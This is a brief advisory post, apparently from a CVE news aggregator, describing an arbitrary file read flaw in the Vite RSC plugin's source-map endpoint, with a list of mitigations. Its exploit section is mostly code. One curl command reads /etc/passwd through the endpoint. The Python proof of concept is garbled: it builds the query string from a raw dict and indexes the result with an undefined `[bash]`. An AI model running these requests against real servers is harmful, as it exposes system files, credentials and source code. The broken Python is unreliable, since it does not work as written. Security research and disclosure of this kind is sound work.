@vitejs/plugin-rsc, Arbitrary File Read Vulnerability (High)

Listen to this Post

The vulnerability exists in the `/__vite_rsc_findSourceMapURL` endpoint of the Vite RSC plugin. During development mode (vite dev), this endpoint accepts a user-controlled `filename` query parameter. If the provided filename string begins with file://, it is converted to a filesystem path using fileURLToPath(). The code then checks if the file exists with `fs.existsSync()` and, without any path traversal or directory validation, reads its entire contents synchronously via fs.readFileSync(filename, 'utf-8'). The file’s content is embedded into a JSON response object within the `sourcesContent` array, which is then returned to the unauthenticated attacker. This allows reading any file accessible to the Node.js process.
Platform: @vitejs/plugin-rsc
Version: latest/unpatched
Vulnerability: Arbitrary file read
Severity: High
date:

Prediction: Patch expected soon

What Undercode Say:

curl 'http://localhost:5173/__vite_rsc_findSourceMapURL?filename=file:///etc/passwd&environmentName=Server'
import urllib.request
import json
url = f"http://{host}:{port}/__vite_rsc_findSourceMapURL"
params = {'filename': f'file://{file_path}', 'environmentName': 'Server'}
response = urllib.request.urlopen(f"{url}?{params}")
data = json.loads(response.read())
print(data['sourcesContent'][bash])

How Exploit:

Network-exposed dev servers

XSS chained attacks

Malicious local packages

Protection from this CVE:

Restrict dev server exposure

Validate file paths

Disable plugin development

Impact:

Leaks environment variables

Exposes secrets/credentials

Compromises source code

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top